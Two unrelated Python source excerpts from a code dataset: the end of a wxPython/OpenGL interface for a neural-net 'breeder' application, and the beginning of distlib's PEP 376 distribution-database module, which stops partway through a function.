fr = int(((worstTotalValue*0.5)*8.0)*255.0)
fg = 255
fb = 0
if bestTotalValue*0.5 >= 0.25:
tr = 255
tg = 0
tb = 0
elif bestTotalValue*0.5 >= 0.125:
tr = 255
tg = int((1.0-((bestTotalValue*0.5-0.125)*8.0))*255.0)
tb = 0
else:
tr = int(((bestTotalValue*0.5)*8.0)*255.0)
tg = 255
tb = 0
neuralNetBreederApp.setIcon(fr,fg,fb,tr,tg,tb)
class ErrorCanvas(WXElements.GLCanvasBase):
def InitGL(self):
self.history = []
light_diffuse = [1.0, 1.0, 1.0, 1.0]
light_position = [1.0, 1.0, 1.0, 0.0]
glLightfv(GL_LIGHT0, GL_DIFFUSE, light_diffuse)
glLightfv(GL_LIGHT0, GL_POSITION, light_position)
glEnable(GL_LIGHTING)
glEnable(GL_LIGHT0)
glEnable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(40.0, 1.0, 1.0, 30.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(0.0, 0.0, 10.0,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
def OnDraw(self):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
glLoadIdentity();
glEnableClientState(GL_VERTEX_ARRAY)
if len(self.history)>=2:
wave_array = []
for historyIndex in range(len(self.history)):
wave_array.append([-1.0 + (2.0 * (float(historyIndex)/float(len(self.history)-1)) ),
-1.0 + (8.0 *self.history[historyIndex])])
wave_array.append([-1.0 + (2.0 * (float(historyIndex)/float(len(self.history)-1)) ),
-1.0 ])
if self.history[-1] >= 0.25:
glColor(1.0,0.0,0.0)
elif self.history[-1] >= 0.125:
glColor(1.0,1.0-((self.history[-1]-0.125)*8.0),0.0)
else:
glColor(((self.history[-1])*8.0),1.0,0.0)
glVertexPointerf(wave_array)
glDrawArrays(GL_QUAD_STRIP, 0, len(wave_array))
self.SwapBuffers()
def setHistory(self, history):
self.history = history
self.Refresh()
self.Update()
class NetPanel(wx.Panel):
def __init__(self, parent,panellabel):
wx.Panel.__init__(self, parent)
panelSizer = wx.FlexGridSizer(0,1,0,0)
panelSizer.AddGrowableCol(0)
panelText = wx.StaticText(self,label=panellabel)
panelSizer.Add(panelText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
nb = wx.Notebook(self)
page1 = wx.Panel(nb)
page1Sizer = wx.FlexGridSizer(0,1,0,0)
page1Sizer.AddGrowableCol(0)
self.nameText = wx.StaticText(page1,label=" ")
page1Sizer.Add(self.nameText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.layerSummaryText = wx.StaticText(page1,label="\n")
page1Sizer.Add(self.layerSummaryText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.connection_rateText = wx.StaticText(page1,label="")
page1Sizer.Add(self.connection_rateText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
page1.SetSizer(page1Sizer)
nb.AddPage(page1,"Neural net")
page2 = wx.Panel(nb)
page2Sizer = wx.FlexGridSizer(0,1,0,0)
page2Sizer.AddGrowableCol(0)
self.trainAlgText = wx.StaticText(page2,label="")
page2Sizer.Add(self.trainAlgText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.learning_rateText = wx.StaticText(page2,label="")
page2Sizer.Add(self.learning_rateText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.learning_momentumText = wx.StaticText(page2,label="")
page2Sizer.Add(self.learning_momentumText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.max_iterationsText = wx.StaticText(page2,label="")
page2Sizer.Add(self.max_iterationsText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
page2.SetSizer(page2Sizer)
nb.AddPage(page2,"Training")
page3 = wx.Panel(nb)
page3Sizer = wx.FlexGridSizer(0,1,0,0)
page3Sizer.AddGrowableCol(0)
page3Sizer.AddGrowableRow(0)
self.nn = ""
printButton = wx.Button(page3, label="Print to console")
printButton.Bind(wx.EVT_BUTTON, self.printDetails)
page3Sizer.Add(printButton, 0, wx.ALIGN_CENTER|wx.ALL, 4)
page3.SetSizer(page3Sizer)
nb.AddPage(page3,"Details")
panelSizer.Add(nb, 0, wx.EXPAND|wx.ALL, 4)
self.errorText = wx.StaticText(self,label="")
panelSizer.Add(self.errorText, 0, wx.ALIGN_LEFT|wx.ALL, )
self.errorCanvas = ''
if noGL:
self.errorCanvas = WXElements.NoGLVisualizationPanel(self)
else:
self.errorCanvas = ErrorCanvas(self)
panelSizer.AddGrowableRow(3)
panelSizer.Add(self.errorCanvas, 0, wx.EXPAND|wx.ALL, 4)
self.testerrorCanvas = ''
if noGL:
self.testerrorCanvas = WXElements.NoGLVisualizationPanel(self)
else:
self.testerrorCanvas = ErrorCanvas(self)
self.testerrorText = wx.StaticText(self,label="")
panelSizer.Add(self.testerrorText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
panelSizer.AddGrowableRow(5)
panelSizer.Add(self.testerrorCanvas, 0, wx.EXPAND|wx.ALL, 4)
self.foodText = wx.StaticText(self,label="")
panelSizer.Add(self.foodText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.qlText = wx.StaticText(self,label="")
panelSizer.Add(self.qlText, 0, wx.ALIGN_LEFT|wx.ALL, 4)
self.SetSizer(panelSizer)
self.SetAutoLayout(1)
def setToNN(self,neuralnet):
self.nn = neuralnet
self.nameText.SetLabel(" Name: "+neuralnet.name)
self.max_iterationsText.SetLabel(" Training Epochs: "+str(neuralnet.max_iterations))
self.learning_rateText.SetLabel(" Learning rate: "+str(neuralnet.learning_rate))
if (neuralnet.connectionType=='Sparse'):
self.connection_rateText.SetLabel(''.join([" ",str(neuralnet.ann.get_total_connections())," Connections (no shortcuts)"]))
elif (neuralnet.connectionType=='Shortcut'):
self.connection_rateText.SetLabel(''.join([" ",str(neuralnet.ann.get_total_connections())," Connections (including shortcuts)"]))
self.foodText.SetLabel(" Energy required: "+str(neuralnet.foodcost))
self.layerSummaryText.SetLabel(''.join([" ",str(1+len(neuralnet.neurons))," Layers (",
str(len(neuralnet.neurons)-1)," hidden)\n ",
str(settings.num_input , sum(map(len,neuralnet.neurons)))," Nodes total (",
str(settings.num_input)," in, ",
str(sum(map(len,neuralnet.neurons[0:-1])))," hidden, ",
str(len(neuralnet.neurons[-1]))," out)"]))
self.layerSummaryText.SetToolTip(wx.ToolTip("Nodes per layer: ",str([settings.num_input].extend(map(len,neuralnet.neurons)))))
if neuralnet.trainAlg == 0:
self.trainAlgText.SetLabel(" Training algorithm: Backprop incremental")
self.trainAlgText.SetToolTip(wx.ToolTip("no special settings"))
elif neuralnet.trainAlg == 1:
self.trainAlgText.SetLabel(" Training algorithm: Backprop batch")
self.trainAlgText.SetToolTip(wx.ToolTip("no special settings"))
elif neuralnet.trainAlg == 2:
self.trainAlgText.SetLabel(" Training algorithm: iRPROP batch")
self.trainAlgText.SetToolTip(wx.ToolTip(''.join(["increase factor: ",str(neuralnet.ann.get_rprop_increase_factor()),"\n",
"decrease factor: ",str(neuralnet.ann.get_rprop_decrease_factor()),"\n",
"delta min: ",str(neuralnet.ann.get_rprop_delta_min()),"\n",
"delta max: ",str(neuralnet.ann.get_rprop_delta_max())])))
elif neuralnet.trainAlg == 3:
self.trainAlgText.SetLabel(" Training algorithm: quickprop batch")
self.trainAlgText.SetToolTip(wx.ToolTip(''.join(["decay: ",str(neuralnet.ann.get_quickprop_decay()),"\n",
"mu: ",str(neuralnet.ann.get_quickprop_mu())])))
self.learning_momentumText.SetLabel(" Learning momentum: "+str(neuralnet.learning_momentum))
self.errorText.SetLabel(" Mean Square Error: "+str(neuralnet.mseHistory[-1]))
self.testerrorText.SetLabel(" Test MSE: "+str(neuralnet.testmseHistory[-1]))
self.errorCanvas.setHistory(neuralnet.mseHistory)
self.testerrorCanvas.setHistory(neuralnet.testmseHistory)
self.qlText.SetLabel(" Total Quality: "+str(1.0-(2.0*neuralnet.summedError)))
def printDetails(self, event=None):
if self.nn != "":
print "\nDetails about ",self.nameText.GetLabel()[7:],":\n"
self.nn.ann.print_parameters()
self.nn.ann.print_connections()
else:
print "\nYou have not started breeding yet.\n"
class GUIMain(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,None,title="Triathlon Breeder",size=(300,600))
self.panel = wx.Panel(self, wx.ID_ANY)
MenuBar = wx.MenuBar()
self.FileMenu = wx.Menu()
item = self.FileMenu.Append(wx.ID_EXIT, text="Quit")
self.Bind(wx.EVT_MENU, self.OnQuit, item)
MenuBar.Append(self.FileMenu, "Menu")
self.SetMenuBar(MenuBar)
sizer = wx.FlexGridSizer(0,1,0,0)
sizer.AddGrowableCol(0)
self.netsTried = wx.StaticText(self.panel,label="Neural nets tried: 0")
sizer.Add(self.netsTried, 0, wx.EXPAND|wx.ALL, 2)
self.playButton = wx.Button(self.panel, label="Start breeding")
self.playButton.Bind(wx.EVT_BUTTON, self.OnPlay)
sizer.Add(self.playButton, 0, wx.EXPAND|wx.ALL, 2)
categoryNotebook = wx.Notebook(self.panel)
self.leftNet = NetPanel(categoryNotebook,''.join(["\n Best Translator\n (saved as ",settings.datafile,".net)\n"]))
self.rightNet = NetPanel(categoryNotebook,"\n New Translator\n (to be tested)\n")
subjectNBPanel = wx.Panel(categoryNotebook)
subjectNBSizer = wx.FlexGridSizer(0,1,0,0)
subjectNB = wx.Notebook(subjectNBPanel)
subjectNBSizer.AddGrowableCol(0)
subjectNBSizer.Add(wx.StaticText(subjectNBPanel,label=""), 0, wx.EXPAND|wx.ALL , 0)
subjectNBSizer.AddGrowableRow(1)
subjectNBSizer.Add(subjectNB, 0, wx.EXPAND)
subjectNBPanel.SetSizer(subjectNBSizer)
self.subjectPanels = []
for i in range(settings.populationSize):
self.subjectPanels.append(NetPanel(subjectNB," Population member"))
subjectNB.AddPage(self.subjectPanels[i],str(i+1))
categoryNotebook.AddPage(self.leftNet,"Best")
categoryNotebook.AddPage(subjectNBPanel,"Population")
categoryNotebook.AddPage(self.rightNet,"New")
sizer.AddGrowableRow(2)
sizer.Add(categoryNotebook, 0, wx.EXPAND|wx.ALL , 2)
self.panel.SetSizer(sizer)
self.panel.Layout()
def OnQuit(self, event=None):
self.Close()
def OnPlay(self, event=None):
if settings.breeding:
settings.breeding = False
self.playButton.SetLabel("Continue breeding")
else:
settings.breeding = True
self.playButton.SetLabel("Pause breeding")
def updateNumberOfNets(self):
self.netsTried.SetLabel("Neural nets tried: "+str(settings.netsTried))
class NeuralNetBreederApp(wx.App):
def __init__(self, redirect = False):
wx.App.__init__(self)
ib = wx.IconBundle()
bmp = self.make_grad_image(32,32, (0,0,0), (0,0,0))
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bmp)
ib.AddIcon(icon)
self.mainWindow = GUIMain()
self.setIcon(0,0,0,0,0,0)
self.mainWindow.Show(True)
def setIcon(self,from_r,from_g,from_b,to_r,to_g,to_b):
ib = wx.IconBundle()
bmp = self.make_grad_image(32,32, (from_r,from_g,from_b), (to_r,to_g,to_b))
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bmp)
ib.AddIcon(icon)
self.mainWindow.SetIcons(ib)
def make_grad_image(self, width, height, col_left, col_right):
array = numpy.zeros((height, width, 3), 'uint8')
alpha = numpy.linspace(0.0, 1.0, width)
color_gradient = numpy.outer(alpha, col_right) + \
numpy.outer((1.0-alpha), col_left)
array[:,:,:] = color_gradient
image = wx.EmptyImage(width, height)
image.SetData(array.tostring())
return wx.BitmapFromImage(image)
if __name__ == "__main__":
datafile = ""
if len(sys.argv)<2:
path = os.getcwd()
fileList = os.listdir(path)
profileList = []
for fileName in fileList:
if fileName[-5:] == "train":
profileList.append(fileName[:-6])
if len(profileList) > 0:
datafile = str(WXElements.selection("Select your Sample-set",profileList[0], profileList))
else:
print "Error: no profiles found"
else:
datafile = sys.argv[1]
if not len(datafile):
print ( "If you want to breed a neural net based on myProfile.train and myProfile.test,\nuse: python Triathlon-Breeder.py myProfile")
else:
if os.path.exists(datafile+".train") and os.path.exists(datafile+".test"):
settings = AppSettings(datafile)
neuralNetBreederApp = NeuralNetBreederApp()
breedTimer = BreedingEventTimer()
neuralNetBreederApp.MainLoop()
else:
print "Error: no", datafile+".train file\nor no", datafile+".test file found."
| mit | -3,211,078,224,814,583,000 | 48.045134 | 164 | 0.557473 | false |
Praveen-1987/devstack-Quantumleap | files/pip-1.4.1/pip/vendor/distlib/database.py | 79 | 49606 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""PEP 376 implementation."""
from __future__ import unicode_literals
import base64
import codecs
import hashlib
import logging
import os
import sys
import zipimport
from . import DistlibException
from .compat import StringIO, configparser, string_types
from .version import get_scheme, UnsupportedVersionError
from .markers import interpret
from .metadata import Metadata
from .util import (parse_requirement, cached_property, get_export_entry,
CSVReader, CSVWriter)
__all__ = ['Distribution', 'BaseInstalledDistribution',
'InstalledDistribution', 'EggInfoDistribution',
'DistributionPath']
logger = logging.getLogger(__name__)
DIST_FILES = ('INSTALLER', 'METADATA', 'RECORD', 'REQUESTED', 'RESOURCES',
'EXPORTS', 'SHARED')
DISTINFO_EXT = '.dist-info'
class _Cache(object):
"""
A simple cache mapping names and .dist-info paths to distributions
"""
def __init__(self):
"""
Initialise an instance. There is normally one for each DistributionPath.
"""
self.name = {}
self.path = {}
self.generated = False
def clear(self):
"""
Clear the cache, setting it to its initial state.
"""
self.name.clear()
self.path.clear()
self.generated = False
def add(self, dist):
"""
Add a distribution to the cache.
:param dist: The distribution to add.
"""
if dist.path not in self.path:
self.path[dist.path] = dist
self.name.setdefault(dist.key, []).append(dist)
class DistributionPath(object):
"""
Represents a set of distributions installed on a path (typically sys.path).
"""
def __init__(self, path=None, include_egg=False):
"""
Create an instance from a path, optionally including legacy (distutils/
setuptools/distribute) distributions.
:param path: The path to use, as a list of directories. If not specified,
sys.path is used.
:param include_egg: If True, this instance will look for and return legacy
distributions as well as those based on PEP 376.
"""
if path is None:
path = sys.path
self.path = path
self._include_dist = True
self._include_egg = include_egg
self._cache = _Cache()
self._cache_egg = _Cache()
self._cache_enabled = True
self._scheme = get_scheme('default')
def _get_cache_enabled(self):
return self._cache_enabled
def _set_cache_enabled(self, value):
self._cache_enabled = value
cache_enabled = property(_get_cache_enabled, _set_cache_enabled)
def clear_cache(self):
"""
Clears the internal cache.
"""
self._cache.clear()
self._cache_egg.clear()
def _yield_distributions(self):
"""
Yield .dist-info and/or .egg(-info) distributions.
"""
for path in self.path:
realpath = os.path.realpath(path)
if not os.path.isdir(realpath):
continue
for dir in os.listdir(realpath):
dist_path = os.path.join(realpath, dir)
if self._include_dist and dir.endswith(DISTINFO_EXT):
yield new_dist_class(dist_path, env=self)
elif self._include_egg and dir.endswith(('.egg-info',
'.egg')):
yield old_dist_class(dist_path, self)
def _generate_cache(self):
"""
Scan the path for distributions and populate the cache with
those that are found.
"""
gen_dist = not self._cache.generated
gen_egg = self._include_egg and not self._cache_egg.generated
if gen_dist or gen_egg:
for dist in self._yield_distributions():
if isinstance(dist, InstalledDistribution):
self._cache.add(dist)
else:
self._cache_egg.add(dist)
if gen_dist:
self._cache.generated = True
if gen_egg:
self._cache_egg.generated = True
@classmethod
def distinfo_dirname(cls, name, version):
"""
The *name* and *version* parameters are converted into their
filename-escaped form, i.e. any ``'-'`` characters are replaced
with ``'_'`` other than the one in ``'dist-info'`` and the one
separating the name from the version number.
:parameter name: is converted to a standard distribution name by replacing
any runs of non- alphanumeric characters with a single
``'-'``.
:type name: string
:parameter version: is converted to a standard version string. Spaces
become dots, and all other non-alphanumeric characters
(except dots) become dashes, with runs of multiple
dashes condensed to a single dash.
:type version: string
:returns: directory name
:rtype: string"""
name = name.replace('-', '_')
return '-'.join([name, version]) + DISTINFO_EXT
def get_distributions(self):
"""
Provides an iterator that looks for distributions and returns
:class:`InstalledDistribution` or
:class:`EggInfoDistribution` instances for each one of them.
:rtype: iterator of :class:`InstalledDistribution` and
:class:`EggInfoDistribution` instances
"""
if not self._cache_enabled:
for dist in self._yield_distributions():
yield dist
else:
self._generate_cache()
for dist in self._cache.path.values():
yield dist
if self._include_egg:
for dist in self._cache_egg.path.values():
yield dist
def get_distribution(self, name):
"""
Looks for a named distribution on the path.
This function only returns the first result found, as no more than one
value is expected. If nothing is found, ``None`` is returned.
:rtype: :class:`InstalledDistribution`, :class:`EggInfoDistribution`
or ``None``
"""
result = None
name = name.lower()
if not self._cache_enabled:
for dist in self._yield_distributions():
if dist.key == name:
result = dist
break
else:
self._generate_cache()
if name in self._cache.name:
result = self._cache.name[name][0]
elif self._include_egg and name in self._cache_egg.name:
result = self._cache_egg.name[name][0]
return result
def provides_distribution(self, name, version=None):
"""
Iterates over all distributions to find which distributions provide *name*.
If a *version* is provided, it will be used to filter the results.
This function only returns the first result found, since no more than
one values are expected. If the directory is not found, returns ``None``.
:parameter version: a version specifier that indicates the version
required, conforming to the format in ``PEP-345``
:type name: string
:type version: string
"""
matcher = None
if not version is None:
try:
matcher = self._scheme.matcher('%s (%s)' % (name, version))
except ValueError:
raise DistlibException('invalid name or version: %r, %r' %
(name, version))
for dist in self.get_distributions():
provided = dist.provides
for p in provided:
p_components = p.rsplit(' ', 1)
if len(p_components) == 1 or matcher is None:
if name == p_components[0]:
yield dist
break
else:
p_name, p_ver = p_components
if len(p_ver) < 2 or p_ver[0] != '(' or p_ver[-1] != ')':
raise DistlibException(
'distribution %r has invalid Provides field: %r' %
(dist.name, p))
p_ver = p_ver[1:-1] # trim off the parenthesis
if p_name == name and matcher.match(p_ver):
yield dist
break
def get_file_path(self, name, relative_path):
"""
Return the path to a resource file.
"""
dist = self.get_distribution(name)
if dist is None:
raise LookupError('no distribution named %r found' % name)
return dist.get_resource_path(relative_path)
def get_exported_entries(self, category, name=None):
"""
Return all of the exported entries in a particular category.
:param category: The category to search for entries.
:param name: If specified, only entries with that name are returned.
"""
for dist in self.get_distributions():
r = dist.exports
if category in r:
d = r[category]
if name is not None:
if name in d:
yield d[name]
else:
for v in d.values():
yield v
class Distribution(object):
"""
A base class for distributions, whether installed or from indexes.
Either way, it must have some metadata, so that's all that's needed
for construction.
"""
build_time_dependency = False
"""
Set to True if it's known to be only a build-time dependency (i.e.
not needed after installation).
"""
requested = False
"""A boolean that indicates whether the ``REQUESTED`` metadata file is
present (in other words, whether the package was installed by user
request or it was installed as a dependency)."""
def __init__(self, metadata):
"""
Initialise an instance.
:param metadata: The instance of :class:`Metadata` describing this
distribution.
"""
self.metadata = metadata
self.name = metadata.name
self.key = self.name.lower() # for case-insensitive comparisons
self.version = metadata.version
self.locator = None
self.md5_digest = None
self.extras = None # additional features requested during installation
@property
def download_url(self):
"""
The download URL for this distribution.
"""
return self.metadata.download_url
@property
def name_and_version(self):
"""
A utility property which displays the name and version in parentheses.
"""
return '%s (%s)' % (self.name, self.version)
@property
def provides(self):
"""
A set of distribution names and versions provided by this distribution.
:return: A set of "name (version)" strings.
"""
plist = self.metadata['Provides-Dist']
s = '%s (%s)' % (self.name, self.version)
if s not in plist:
plist.append(s)
return self.filter_requirements(plist)
@property
def requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist)
@property
def setup_requires(self):
rlist = self.metadata['Setup-Requires-Dist']
return self.filter_requirements(rlist)
@property
def test_requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist, extras=['test'])
@property
def doc_requires(self):
rlist = self.metadata['Requires-Dist']
return self.filter_requirements(rlist, extras=['doc'])
def filter_requirements(self, rlist, context=None, extras=None):
result = set()
marked = []
for req in rlist:
if ';' not in req:
result.add(req)
else:
marked.append(req.split(';', 1))
if marked:
if context is None:
context = {}
if extras is None:
extras = self.extras
if not extras:
extras = [None]
else:
extras = list(extras) # leave original alone
extras.append(None)
for extra in extras:
context['extra'] = extra
for r, marker in marked:
if interpret(marker, context):
result.add(r.strip())
return result
def matches_requirement(self, req):
"""
Say if this instance matches (fulfills) a requirement.
:param req: The requirement to match.
:rtype req: str
:return: True if it matches, else False.
"""
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
# Note this is similar to code in make_graph - to be refactored
for p in self.provides:
vm = scheme.matcher(p)
if vm.key != name:
continue
version = vm.exact_version
assert version
try:
result = matcher.match(version)
break
except UnsupportedVersionError:
pass
return result
def __repr__(self):
"""
Return a textual representation of this instance,
"""
if self.download_url:
suffix = ' [%s]' % self.download_url
else:
suffix = ''
return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
"""
See if this distribution is the same as another.
:param other: The distribution to compare with. To be equal to one
another. distributions must have the same type, name,
version and download_url.
:return: True if it is the same, else False.
"""
if type(other) is not type(self):
result = False
else:
result = (self.name == other.name and
self.version == other.version and
self.download_url == other.download_url)
return result
def __hash__(self):
"""
Compute hash in a way which matches the equality test.
"""
return hash(self.name) + hash(self.version) + hash(self.download_url)
class BaseInstalledDistribution(Distribution):
"""
This is the base class for installed distributions (whether PEP 376 or
legacy).
"""
hasher = None
def __init__(self, metadata, path, env=None):
"""
Initialise an instance.
:param metadata: An instance of :class:`Metadata` which describes the
distribution. This will normally have been initialised
from a metadata file in the ``path``.
:param path: The path of the ``.dist-info`` or ``.egg-info``
directory for the distribution.
:param env: This is normally the :class:`DistributionPath`
instance where this distribution was found.
"""
super(BaseInstalledDistribution, self).__init__(metadata)
self.path = path
self.dist_path = env
def get_hash(self, data, hasher=None):
"""
Get the hash of some data, using a particular hash algorithm, if
specified.
:param data: The data to be hashed.
:type data: bytes
:param hasher: The name of a hash implementation, supported by hashlib,
or ``None``. Examples of valid values are ``'sha1'``,
``'sha224'``, ``'sha384'``, '``sha256'``, ``'md5'`` and
``'sha512'``. If no hasher is specified, the ``hasher``
attribute of the :class:`InstalledDistribution` instance
is used. If the hasher is determined to be ``None``, MD5
is used as the hashing algorithm.
:returns: The hash of the data. If a hasher was explicitly specified,
the returned hash will be prefixed with the specified hasher
followed by '='.
:rtype: str
"""
if hasher is None:
hasher = self.hasher
if hasher is None:
hasher = hashlib.md5
prefix = ''
else:
hasher = getattr(hashlib, hasher)
prefix = '%s=' % self.hasher
digest = hasher(data).digest()
digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
return '%s%s' % (prefix, digest)
class InstalledDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``METADATA`` when it is
instantiated., or uses a passed in Metadata instance (useful for when
dry-run mode is being used)."""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
if env and env._cache_enabled and path in env._cache.path:
metadata = env._cache.path[path].metadata
elif metadata is None:
metadata_path = os.path.join(path, 'METADATA')
metadata = Metadata(path=metadata_path, scheme='legacy')
super(InstalledDistribution, self).__init__(metadata, path, env)
if env and env._cache_enabled:
env._cache.add(self)
path = self.get_distinfo_file('REQUESTED')
self.requested = os.path.exists(path)
def __repr__(self):
return '<InstalledDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def _get_records(self):
"""
Get the list of installed files for the distribution
:return: A list of tuples of path, hash and size. Note that hash and
size might be ``None`` for some entries. The path is exactly
as stored in the file (which is as in PEP 376).
"""
results = []
path = self.get_distinfo_file('RECORD')
with CSVReader(path) as record_reader:
# Base location is parent dir of .dist-info dir
#base_location = os.path.dirname(self.path)
#base_location = os.path.abspath(base_location)
for row in record_reader:
missing = [None for i in range(len(row), 3)]
path, checksum, size = row + missing
#if not os.path.isabs(path):
# path = path.replace('/', os.sep)
# path = os.path.join(base_location, path)
results.append((path, checksum, size))
return results
@cached_property
def exports(self):
"""
Return the information exported by this distribution.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
rf = self.get_distinfo_file('EXPORTS')
if os.path.exists(rf):
result = self.read_exports(rf)
return result
def read_exports(self, filename=None):
"""
Read exports data from a file in .ini format.
:param filename: An absolute pathname of the file to read. If not
specified, the EXPORTS file in the .dist-info
directory of the distribution is read.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
rf = filename or self.get_distinfo_file('EXPORTS')
if os.path.exists(rf):
cp = configparser.ConfigParser()
cp.read(rf)
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
entry.dist = self
entries[name] = entry
return result
def write_exports(self, exports, filename=None):
"""
Write a dictionary of exports to a file in .ini format.
:param exports: A dictionary of exports, mapping an export category to
a list of :class:`ExportEntry` instances describing the
individual export entries.
:param filename: The absolute pathname of the file to write to. If not
specified, the EXPORTS file in the .dist-info
directory is written to.
"""
rf = filename or self.get_distinfo_file('EXPORTS')
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
with open(rf, 'w') as f:
cp.write(f)
def get_resource_path(self, relative_path):
"""
NOTE: This API may change in the future.
Return the absolute path to a resource file with the given relative
path.
:param relative_path: The path, relative to .dist-info, of the resource
of interest.
:return: The absolute path where the resource is to be found.
"""
path = self.get_distinfo_file('RESOURCES')
with CSVReader(path) as resources_reader:
for relative, destination in resources_reader:
if relative == relative_path:
return destination
raise KeyError('no resource file with relative path %r '
'is installed' % relative_path)
def list_installed_files(self):
"""
Iterates over the ``RECORD`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: iterator of (path, hash, size)
"""
for result in self._get_records():
yield result
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = os.path.join(self.path, 'RECORD')
logger.info('creating %s', record_path)
if dry_run:
return
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
# add the RECORD file itself
if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = os.path.join(self.path, 'RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', hash_value, actual_hash))
return mismatches
@cached_property
def shared_locations(self):
"""
A dictionary of shared locations whose keys are in the set 'prefix',
'purelib', 'platlib', 'scripts', 'headers', 'data' and 'namespace'.
The corresponding value is the absolute path of that category for
this distribution, and takes into account any paths selected by the
user at installation time (e.g. via command-line arguments). In the
case of the 'namespace' key, this would be a list of absolute paths
for the roots of namespace packages in this distribution.
The first time this property is accessed, the relevant information is
read from the SHARED file in the .dist-info directory.
"""
result = {}
shared_path = os.path.join(self.path, 'SHARED')
if os.path.isfile(shared_path):
with codecs.open(shared_path, 'r', encoding='utf-8') as f:
lines = f.read().splitlines()
for line in lines:
key, value = line.split('=', 1)
if key == 'namespace':
result.setdefault(key, []).append(value)
else:
result[key] = value
return result
def write_shared_locations(self, paths, dry_run=False):
"""
Write shared location information to the SHARED file in .dist-info.
:param paths: A dictionary as described in the documentation for
:meth:`shared_locations`.
:param dry_run: If True, the action is logged but no file is actually
written.
:return: The path of the file written to.
"""
shared_path = os.path.join(self.path, 'SHARED')
logger.info('creating %s', shared_path)
if dry_run:
return
lines = []
for key in ('prefix', 'lib', 'headers', 'scripts', 'data'):
path = paths[key]
if os.path.isdir(paths[key]):
lines.append('%s=%s' % (key, path))
for ns in paths.get('namespace', ()):
lines.append('namespace=%s' % ns)
with codecs.open(shared_path, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
return shared_path
def get_distinfo_file(self, path):
"""
Returns a path located under the ``.dist-info`` directory. Returns a
string representing the path.
:parameter path: a ``'/'``-separated path relative to the
``.dist-info`` directory or an absolute path;
If *path* is an absolute path and doesn't start
with the ``.dist-info`` directory path,
a :class:`DistlibException` is raised
:type path: string
:rtype: str
"""
# Check if it is an absolute path # XXX use relpath, add tests
if path.find(os.sep) >= 0:
# it's an absolute path?
distinfo_dirname, path = path.split(os.sep)[-2:]
